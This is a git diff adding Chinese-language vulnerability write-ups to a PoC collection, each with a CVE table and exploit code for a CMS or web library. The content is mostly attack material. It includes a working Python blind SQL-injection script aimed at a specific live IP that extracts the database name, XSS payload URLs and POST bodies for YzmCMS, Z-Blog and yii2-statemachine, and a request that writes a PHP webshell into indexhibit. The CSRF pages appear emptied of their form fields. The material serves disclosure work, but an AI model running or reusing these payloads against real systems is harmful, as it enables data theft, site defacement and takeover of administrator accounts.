+- [Cobub Razor 0.8.0存在SQL注入漏洞](Cobub%20Razor%200.8.0存在SQL注入漏洞.md) +- [Cobub Razor 0.8.0存在物理路径泄露漏洞](Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md) +- [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md) +- [DomainMod的XSS集合](DomainMod的XSS集合.md) +- [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md) +- [yii2-statemachine v2.x.x存在XSS漏洞](yii2-statemachine%20v2.x.x存在XSS漏洞.md) +- [maccms_v10存在CSRF漏洞可增加任意账号](maccms_v10存在CSRF漏洞可增加任意账号.md) +- [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md) +- [FUELCMS 1.4存在CSRF可修改管理员账户密码](FUELCMS%201.4存在CSRF可修改管理员账户密码.md) +- [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md) +- [Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞](Amazon%20Kindle%20Fire%20HD%20\(3rd%20Generation\)内核驱动拒绝服务漏洞.md) +- [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md) +- [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md) +- [indexhibit cms v2.1.5 直接编辑php文件getshell](indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md) +- [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md) +- [Sitemagic CMS v4.4后台未过滤直接上传php导致getshell](Sitemagic%20CMS%20v4.4后台未过滤直接上传php导致getshell.md) +- [S-CMS PHP v3.0存在SQL注入漏洞](S-CMS%20PHP%20v3.0存在SQL注入漏洞.md) ## Mobile APP diff --git "a/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 00000000..0e13df7c --- /dev/null +++ "b/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,69 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|S-CMS PHP v3.0存在SQL注入漏洞|2019-05-31|zhhhy|[https://www.s-cms.cn/download.html?code=php](https://www.s-cms.cn/download.html?code=php) | [https://www.s-cms.cn/download.html?code=php](https://www.s-cms.cn/download.html?code=php) |PHP v3.0| [CVE-2019-12860](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12860)| + +#### 漏洞概述 + +> 漏洞代码位置:/js/scms.php 第182-204行,在第83行处,变量$pageid接受使用POST方式传递的pageid的值。而在第87行和第95行处,变量$pageid被直接拼接进SQL语句之中,从而产生注入。而由于是数字型注入,避免使用单引号等符号以至于绕过了防御。 + +### POC实现代码如下: + +> 构造如下poc.py + +``` python +import requests +import urllib.parse + +chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_0123456789' + +url='http://106.14.144.32:2000/js/scms.php' + +def getDatabaseLength(): + print('开始爆破数据库长度。。。') + for i in range(10): + payload="1%0Aand%0Aif(length(database())>{},1,0)#".format(i) + payload=urllib.parse.unquote(payload) + data = { + 'action':'jssdk', + 'pagetype':'text', + 'pageid':payload + } + # print(data) + # data = urllib.parse.unquote(data) + # print(data) + rs = requests.post(url=url,data=data) + rs.encode='utf-8' + # print(rs.text) + if "20151019102732946.jpg" not in rs.text: + print("数据库名的长度为:{}".format(i)) + return i + +def getDatabaseName(): + print('开始获取数据库名') + databasename = '' + + length = getDatabaseLength() + # length = 4 + for i in range(1,length+1): + for c in chars: + payload='1%0Aand%0Aif(ascii(substr(database(),{},1))={},1,0)#'.format(i,ord(c)) + # print(payload) + payload = urllib.parse.unquote(payload) + data = { + 'action': 'jssdk', + 'pagetype': 'text', + 'pageid': payload + } + rs = requests.post(url=url, data=data) + rs.encode = 'utf-8' + # print(rs.text) + if "20151019102732946.jpg" in rs.text: + databasename = databasename+c + print(databasename) + + return databasename +getDatabaseName() +``` +### 漏洞详情:[PDF版详情](POC_Details/S-CMS%20PHP%20v30存在SQL注入漏洞.pdf) \ No newline at end of file diff --git "a/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md" "b/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md" new file mode 100644 index 00000000..71361241 --- /dev/null +++ "b/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md" @@ -0,0 +1,42 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号|2019-02-22|qn(137535957@qq.cn)|[https://www.s-cms.cn](https://www.s-cms.cn) | [https://www.s-cms.cn](https://www.s-cms.cn) |PHP v3.0| [CVE-2019-9040](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9040)| + +#### 漏洞概述 + +> 恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。 + +### POC实现代码如下: + +> exp代码如下: + +``` html + + + +
+ + + + + + + + + + + + + + + + + + + +
+ + +``` diff --git "a/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" new file mode 100644 index 00000000..04aca1ca --- /dev/null +++ "b/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" @@ -0,0 +1,23 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|YzmCMS 3.6存在XSS漏洞|2018-04-05|zzw (zzw@5ecurity.cn)|[http://www.yzmcms.com/](http://www.yzmcms.com/) | [http://www.yzmcms.com/](http://www.yzmcms.com/) |3.6| [CVE-2018-7653](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7653)| + +#### 漏洞概述 + +> YzmCMS 3.6版本的 index.php页面a、c、m参数过滤不严格可导致跨站脚本漏洞。 + +### POC实现代码如下: + +> poc代码: + +``` html +http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes + +http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes + +http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes + +http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes +``` diff --git "a/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" new file mode 100644 index 00000000..2d8815da --- /dev/null +++ "b/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" @@ -0,0 +1,29 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Z-Blog 1.5.1.1740存在XSS漏洞|2018-04-05|zzw (zzw@5ecurity.cn)|[https://www.zblogcn.com/](https://www.zblogcn.com/) | [https://github.com/zblogcn/zblogphp](https://github.com/zblogcn/zblogphp) |1.5.1.1740| [CVE-2018-7736](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7736)| + +#### 漏洞概述 + +> Z-BlogPHP 1.5.1.1740版本的cmd.php页面ZC_BLOG_SUBNAME及ZC_UPLOAD_FILETYPE参数过滤不严格可导致跨站脚本漏洞。 + +### POC实现代码如下: + +> ZC_BLOG_SUBNAME参数poc代码: + +``` raw +post_url:http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f + +post_data: + +ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE= + +``` +> ZC_UPLOAD_FILETYPE参数poc代码: + +```raw +post_data: + +ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek">ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE= +``` \ No newline at end of file diff --git a/img/4.png b/img/4.png new file mode 100644 index 00000000..f331d815 Binary files /dev/null and b/img/4.png differ diff --git a/img/5.png b/img/5.png new file mode 100644 index 00000000..9656768a Binary files /dev/null and b/img/5.png differ diff --git a/img/6.png b/img/6.png new file mode 100644 index 00000000..c8ef95b5 Binary files /dev/null and b/img/6.png differ diff --git a/img/7.png b/img/7.png new file mode 100644 index 00000000..b42ddcc6 Binary files /dev/null and b/img/7.png differ diff --git a/img/8.png b/img/8.png new file mode 100644 index 00000000..86e43f0a Binary files /dev/null and b/img/8.png differ diff --git "a/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md" "b/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md" new file mode 100644 index 00000000..cfff3782 --- /dev/null +++ "b/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md" @@ -0,0 +1,24 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|indexhibit cms v2.1.5 直接编辑php文件getshell|2019-02-20|yc(3365487579@qq.com)|[https://www.indexhibit.org/](https://www.indexhibit.org/) | [https://www.indexhibit.org/](https://www.indexhibit.org/) |v2.1.5| [CVE-2019-8954](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8954)| + +#### 漏洞概述 + +> indexhibit CMS 2.1.5版本存在一个直接编辑php文件的漏洞,导致getshell。 + +### POC实现代码如下: + +> 当我们登录进后台后,向/ndxzstudio/?a=system +> post数据: + +``` raw +upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php +``` +> 即可在/css/目录写入一个php文件audio.php。 +![POST数据](img/7.png) + +> 成功getshell: +![POST数据](img/8.png) + diff --git "a/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" new file mode 100644 index 00000000..690867eb --- /dev/null +++ "b/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" @@ -0,0 +1,28 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户|2018-03-14|yx(yx@5ecurity.cn)|[https://github.com/joyplus/joyplus-cms/](https://github.com/joyplus/joyplus-cms/) | [https://github.com/joyplus/joyplus-cms/](https://github.com/joyplus/joyplus-cms/) |1.6.0 | [CVE-2018-8717](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8717)| + +#### 漏洞概述 + +> joyplus-cms 1.6.0存在CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。joyplus-cms是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/joyplus/joyplus-cms/issues/419)告知作者。 + +### POC实现代码如下: + +> CSRF测试页面代码如下: +``` html + + + +
+ + + + + + +
+ + +``` diff --git "a/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md" "b/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md" new file mode 100644 index 00000000..d1740e1f --- /dev/null +++ "b/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md" @@ -0,0 +1,29 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|maccms_v10存在CSRF漏洞可增加任意账号|2018-06-11|Bay0net|[http://www.maccms.com/](http://www.maccms.com/) | [http://www.maccms.com/down.html](http://www.maccms.com/down.html) |v10| [CVE-2018-12114](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12114)| + +#### 漏洞概述 + +> 恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。 + +### POC实现代码如下: + +> exp代码如下: + +``` html + + + +
+ + + + + + +
+ + +``` diff --git "a/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" new file mode 100644 index 00000000..81f5edf5 --- /dev/null +++ "b/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" @@ -0,0 +1,20 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|yii2-statemachine v2.x.x存在XSS漏洞|2018-06-12|longer|[https://github.com/ptheofan/yii2-statemachine-demo](https://github.com/ptheofan/yii2-statemachine-demo) | [https://github.com/ptheofan/yii2-statemachine-demo](https://github.com/ptheofan/yii2-statemachine-demo) |v2.x.x| [CVE-2018-12290](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12290)| + +#### 漏洞概述 + +> 由于role参数过滤不严格,导致可以插入js代码造成跨站脚本攻击。如将role参数赋值为`guest'%22()%26%25prompt(123555)`,并进行get方式提交,可造成跨站脚本攻击。 + +### POC实现代码如下: + +> exp代码如下: + +``` html +https://127.0.0.1/?role=guest'%22()%26%25prompt(123555) +``` +### POC截图效果如下: + +![POC运行截图](img/4.png) \ No newline at end of file diff --git "a/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" new file mode 100644 index 00000000..57398c52 --- /dev/null +++ "b/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" @@ -0,0 +1,90 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|五指CMS 4.1.0存在CSRF漏洞可增加管理员账户|2018-04-10|套哥(taoge@5ecurity.cn)|[https://github.com/wuzhicms/wuzhicms](https://github.com/wuzhicms/wuzhicms) | [https://github.com/wuzhicms/wuzhicms](https://github.com/wuzhicms/wuzhicms) |4.1.0| [CVE-2018-9926](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9926)/[CVE-2018-9927](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9927)| + +#### 漏洞概述 + +> 五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/wuzhicms/wuzhicms/issues/128)告知作者。 + + +### POC实现代码如下: + +> CSRF测试页面代码一如下: + +``` html + + + +``` + +> CSRF测试页面代码二如下: + +``` html + + + +``` \ No newline at end of file